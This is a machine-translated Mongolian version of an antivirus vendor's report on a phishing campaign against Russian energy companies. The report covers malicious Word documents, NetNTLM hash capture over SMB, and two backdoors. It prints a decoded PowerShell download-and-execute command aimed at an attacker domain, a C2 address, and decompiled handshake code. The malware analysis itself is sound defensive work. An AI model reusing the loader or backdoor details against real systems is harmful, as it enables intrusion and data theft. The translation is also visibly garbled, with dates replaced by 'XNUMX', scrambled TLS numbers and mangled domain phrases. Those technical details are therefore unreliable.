Компьютерийн аюулгүй байдлын зөрчлийг судалж байсан бидний туршлагаас харахад цахим шуудан нь халдагчдын халдлагад өртсөн сүлжээний дэд бүтцэд анх нэвтэрдэг хамгийн түгээмэл сувгуудын нэг хэвээр байна. Сэжигтэй (эсвэл тийм ч сэжигтэй биш) захидал бүхий нэг хайхрамжгүй үйлдэл нь цаашдын халдварын нэвтрэх цэг болдог тул кибер гэмт хэрэгтнүүд янз бүрийн амжилтанд хүрсэн ч нийгмийн инженерчлэлийн аргыг идэвхтэй ашиглаж байна.
Энэ нийтлэлд бид Оросын түлш, эрчим хүчний цогцолборын хэд хэдэн аж ахуйн нэгжид чиглэсэн спам кампанит ажлын талаар саяхан хийсэн мөрдөн байцаалтын талаар ярихыг хүсч байна. Бүх халдлага нь хуурамч имэйл ашиглан ижил хувилбараар явагдсан бөгөөд хэн ч эдгээр имэйлийн текстийн агуулгад ихээхэн хүчин чармайлт гаргаагүй бололтой.
Тагнуул
Энэ бүхэн 2020 оны XNUMX-р сарын сүүлээр Доктор Вэб вирусын шинжээчид Оросын түлш, эрчим хүчний цогцолборын хэд хэдэн аж ахуйн нэгжийн ажилтнуудад шинэчлэгдсэн утасны лавлахыг хакерууд илгээсэн спам кампанит ажлыг илрүүлснээр эхэлсэн. Мэдээжийн хэрэг, энэ нь энгийн санаа зовоосон шоу биш байсан, учир нь лавлах нь бодит биш байсан бөгөөд .docx баримтууд нь алсын нөөцөөс хоёр зургийг татаж авсан.
Тэдгээрийн нэгийг нь news[.]zannews[.]com серверээс хэрэглэгчийн компьютерт татаж авсан. Домэйн нэр нь Казахстаны авлигатай тэмцэх мэдээллийн төвийн домэйнтэй төстэй байгаа нь анхаарал татаж байна - zannews[.]kz. Нөгөөтэйгүүр, ашигласан домэйн нь ICEFOG арын хаалга ашигладаг, нэрэндээ "мэдээ" гэсэн дэд мөр бүхий Трояны хяналтын домэйнуудтай байсан TOPNEWS гэгддэг 2015 оны өөр кампанит ажлыг санагдууллаа. Өөр нэг сонирхолтой онцлог нь өөр өөр хүлээн авагчид имэйл илгээхдээ зураг татаж авах хүсэлт нь өөр өөр хүсэлтийн параметр эсвэл өвөрмөц зургийн нэрийг ашигладаг байсан явдал байв.
Энэ нь "найдвартай" хаяг хүлээн авагчийг олж мэдэхийн тулд мэдээлэл цуглуулах зорилгоор хийгдсэн гэж бид үзэж байгаа бөгөөд тэр захиаг зөв цагт нь нээх баталгаатай болно. SMB протоколыг хоёр дахь серверээс зургийг татаж авахад ашигласан бөгөөд энэ нь хүлээн авсан баримтыг нээсэн ажилчдын компьютерээс NetNTLM хэшийг цуглуулах боломжтой юм.
Хуурамч лавлахтай захидал энд байна:
Энэ оны зургадугаар сард хакерууд sports[.]manhajnews[.]com хэмээх шинэ домэйн нэрийг ашиглан зураг байршуулах болсон. Шинжилгээгээр manhajnews[.]com дэд домайныг дор хаяж 2019 оны XNUMX-р сараас хойш спам шуудангаар ашигласан болохыг харуулсан. Энэ кампанит ажлын нэг бай нь Оросын томоохон их сургууль байв.
Түүнчлэн, зургадугаар сар гэхэд халдлагыг зохион байгуулагчид захидлынхаа шинэ текстийг гаргаж ирэв: энэ удаад уг баримт бичигт аж үйлдвэрийн хөгжлийн талаарх мэдээлэл багтсан байв. Захидлын эх бичвэр нь түүний зохиогч нь орос хэлээр ярьдаг хүн биш, эсвэл өөрийнхөө тухай санаатайгаар ийм сэтгэгдэл төрүүлж байгааг тодорхой харуулсан. Харамсалтай нь салбарыг хөгжүүлэх санаанууд урьдын адил зүгээр л хавтас болж хувирсан - баримт бичиг дахин хоёр зургийг татаж авсан бол серверийг татаж авах[.]inklingpaper[.]com болгон өөрчилсөн.
Дараагийн шинэлэг нь долдугаар сард гарсан. Вирусны эсрэг программууд хортой баримт бичгийг илрүүлэхийг тойрч гарахын тулд халдагчид нууц үгээр шифрлэгдсэн Microsoft Word баримт бичгүүдийг ашиглаж эхэлсэн. Үүний зэрэгцээ халдлага үйлдэгчид нийгмийн инженерчлэлийн сонгодог арга болох шагналын мэдэгдэл ашиглахаар шийджээ.
Өргөдлийн текстийг дахин ижил хэв маягаар бичсэн нь хаяг хүлээн авагчдын дунд нэмэлт сэжиг төрүүлэв. Зургийг татаж авах сервер бас өөрчлөгдөөгүй.
Бүх тохиолдолд захидал илгээхэд mail[.]ru болон yandex[.]ru домэйнд бүртгэгдсэн цахим шуудангийн хайрцгийг ашигласан гэдгийг анхаарна уу.
Довтолгоо
2020 оны XNUMX-р сарын эхээр арга хэмжээ авах цаг болсон. Манай вирусын шинжээчид халдлагын шинэ давалгааг бүртгэж, халдагчид утасны лавлахыг шинэчлэх нэрийдлээр дахин захидал илгээв. Гэхдээ энэ удаагийн хавсралтад хортой макро агуулагдсан байна.
Хавсаргасан баримтыг нээх үед макро хоёр файл үүсгэсэн:
- Багц файлыг эхлүүлэх зорилготой VBS скрипт %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs;
- Багц файл нь өөрөө %APPDATA%configstest.bat бөгөөд энэ нь ойлгомжгүй байсан.
Түүний ажлын мөн чанар нь тодорхой параметр бүхий Powershell бүрхүүлийг эхлүүлэх явдал юм. Бүрхүүлд дамжуулагдсан параметрүүдийг тушаал болгон тайлсан болно.
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Танилцуулсан тушаалуудаас үзэхэд ачааллыг татаж авах домэйн дахин мэдээллийн сайтын дүрд хувирсан байна. Энгийн , түүний цорын ганц үүрэг бол команд болон хяналтын серверээс бүрхүүлийн кодыг хүлээн авч, гүйцэтгэх явдал юм. Бид хохирогчийн компьютер дээр суулгаж болох хоёр төрлийн арын хаалгыг тодорхойлж чадсан.
BackDoor.Siggen2.3238
Эхнийх нь BackDoor.Siggen2.3238 - Манай мэргэжилтнүүд өмнө нь уулзаж байгаагүй бөгөөд бусад вирусны эсрэг үйлдвэрлэгчид энэ програмын талаар дурдаагүй.
Энэ програм нь C++ хэл дээр бичигдсэн, 32 битийн Windows үйлдлийн систем дээр ажилладаг арын хаалга юм.
BackDoor.Siggen2.3238 HTTP болон HTTPS гэсэн хоёр протоколыг ашиглан удирдлагын сервертэй холбогдох боломжтой. Туршилтын дээж нь HTTPS протоколыг ашигладаг. Дараах Хэрэглэгч-Агентыг серверт хүсэлт гаргахад ашигладаг:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Энэ тохиолдолд бүх хүсэлтийг дараах параметрийн багцаар хангана.
%s;type=%s;length=%s;realdata=%send
Энд %s мөр бүрийг дараах байдлаар солино:
- халдвар авсан компьютерийн ID,
- илгээж буй хүсэлтийн төрөл,
- бодит мэдээллийн талбар дахь өгөгдлийн урт,
- өгөгдөл.
Халдвар авсан системийн тухай мэдээлэл цуглуулах үе шатанд арын хаалга нь дараах шугамыг үүсгэдэг.
lan=%s;cmpname=%s;username=%s;version=%s;
Энд lan нь халдвар авсан компьютерийн IP хаяг, cmpname нь компьютерийн нэр, хэрэглэгчийн нэр, хэрэглэгчийн нэр, хувилбар нь 0.0.4.03 мөр юм.
Энэхүү sysinfo танигчтай мэдээллийг https[:]//31.214[.]157.14/log.txt хаягаар байрлах хяналтын сервер рүү POST хүсэлтээр илгээдэг. Хариуд нь байвал BackDoor.Siggen2.3238 ЗҮРХНИЙ дохиог хүлээн авч, холболт амжилттай болсон гэж үзэж, арын хаалга нь сервертэй харилцах үндсэн мөчлөгийг эхлүүлнэ.
Үйл ажиллагааны зарчмуудын дэлгэрэнгүй тайлбар BackDoor.Siggen2.3238 манайд байдаг .
Арын хаалга.Цагаан шувуу.23
Хоёрдахь хөтөлбөр нь Казахстаны төрийн байгууллагатай болсон явдлаас бидэнд аль хэдийн мэдэгдэж байсан BackDoor.Whitebird арын хаалганы өөрчлөлт юм. Энэ хувилбар нь C++ хэл дээр бичигдсэн бөгөөд 32 болон 64 битийн Windows үйлдлийн системүүд дээр ажиллахад зориулагдсан.
Энэ төрлийн ихэнх програмуудын нэгэн адил, Арын хаалга.Цагаан шувуу.23 хяналтын сервертэй шифрлэгдсэн холболт, халдвар авсан компьютерийг зөвшөөрөлгүй хянах зорилготой. Дусаагуур ашиглан эвдэрсэн системд суулгасан .
Бидний шалгасан дээж нь хоёр экспорттой хортой номын сан байв:
- Google Play
- Туршилт.
Ажлынхаа эхэнд 0x99 байт бүхий XOR үйлдэл дээр суурилсан алгоритмыг ашиглан арын хаалганы биед холбогдсон тохиргоог тайлдаг. Тохиргоо нь дараах байдлаар харагдаж байна.
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Байнгын ажиллагааг хангахын тулд арын хаалга нь талбарт заасан утгыг өөрчилдөг ажлын цаг тохиргоо. Талбар нь 1440 эсвэл 0 утгыг авч, өдрийн цаг бүрийн минут бүрийг илэрхийлдэг 1 байт агуулдаг. Сүлжээний интерфэйс бүрийн хувьд интерфэйсийг сонсож, халдвар авсан компьютерээс прокси серверээс зөвшөөрлийн пакетуудыг хайж олох тусдаа хэлхээ үүсгэдэг. Ийм пакет илэрсэн үед арын хаалга нь прокси серверийн талаарх мэдээллийг жагсаалтдаа нэмдэг. Үүнээс гадна WinAPI-ээр дамжуулан прокси байгаа эсэхийг шалгадаг InternetQueryOptionW.
Хөтөлбөр нь одоогийн минут, цагийг шалгаж, талбарт байгаа өгөгдөлтэй харьцуулдаг ажлын цаг тохиргоо. Хэрэв өдрийн харгалзах минутын утга тэг биш бол хяналтын сервертэй холболт тогтооно.
Сервертэй холболт үүсгэх нь үйлчлүүлэгч болон серверийн хооронд TLS хувилбар 1.0 протоколыг ашиглан холболт үүсгэхийг дуурайдаг. Арын хаалганы их бие нь хоёр буфер агуулдаг.
Эхний буфер нь TLS 1.0 Client Hello багцыг агуулна.
Хоёрдахь буфер нь 1.0x0 байт түлхүүрийн урттай TLS 100 Client Key Exchange пакетууд, Change Cipher Spec, Encrypted Handshake Message агуулдаг.
Client Hello багцыг илгээх үед арын хаалга нь Client Random талбарт одоогийн цагийн 4 байт, псевдо санамсаргүй 28 байт өгөгдлийг дараах байдлаар бичнэ.
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Хүлээн авсан багцыг хяналтын сервер рүү илгээдэг. Хариулт (Server Hello пакет) дараахийг шалгана:
- TLS протоколын 1.0 хувилбартай нийцэх;
- Үйлчлүүлэгчийн тодорхойлсон цагийн тэмдэг (санамсаргүй өгөгдлийн багц талбарын эхний 4 байт) серверийн заасан цагийн тэмдэгтэй харьцах байдал;
- Үйлчлүүлэгч болон серверийн Санамсаргүй өгөгдлийн талбар дахь цагийн тэмдгийн дараах эхний 4 байтын таарч байна.
Заасан таарч байгаа тохиолдолд арын хаалга нь Client Key Exchange багцыг бэлддэг. Үүнийг хийхийн тулд Client Key Exchange багцын Нийтийн Түлхүүрийг, мөн Шифрлэгдсэн гар барих мессежийн багц дахь Encryption IV болон Encryption Data-г өөрчилдөг.
Дараа нь арын хаалга нь тушаал, хяналтын серверээс пакетыг хүлээн авч, TLS протоколын хувилбар 1.0 эсэхийг шалгаад дараа нь өөр 54 байт (пакетийн бие) хүлээн авна. Энэ нь холболтын тохиргоог дуусгана.
Үйл ажиллагааны зарчмуудын дэлгэрэнгүй тайлбар Арын хаалга.Цагаан шувуу.23 манайд байдаг .
Дүгнэлт ба дүгнэлт
Баримт бичиг, хортой программ хангамж, ашигласан дэд бүтцэд хийсэн дүн шинжилгээ нь халдлагыг Хятадын APT бүлэглэлүүдийн нэг бэлтгэсэн гэж баттай хэлэх боломжийг бидэнд олгодог. Амжилттай халдлага болсон тохиолдолд хохирогчдын компьютерт суулгасан арын хаалганы функцийг авч үзвэл халдвар нь наад зах нь халдлагад өртсөн байгууллагын компьютерээс нууц мэдээллийг хулгайлахад хүргэдэг.
Нэмж дурдахад маш их магадлалтай хувилбар бол тусгай функц бүхий локал серверүүд дээр тусгай троянуудыг суулгах явдал юм. Эдгээр нь домэйн хянагч, шуудангийн сервер, интернет гарц гэх мэт байж болно. Бидний жишээнээс харж болно. , ийм серверүүд янз бүрийн шалтгааны улмаас халдагчдад онцгой сонирхолтой байдаг.
Эх сурвалж: www.habr.com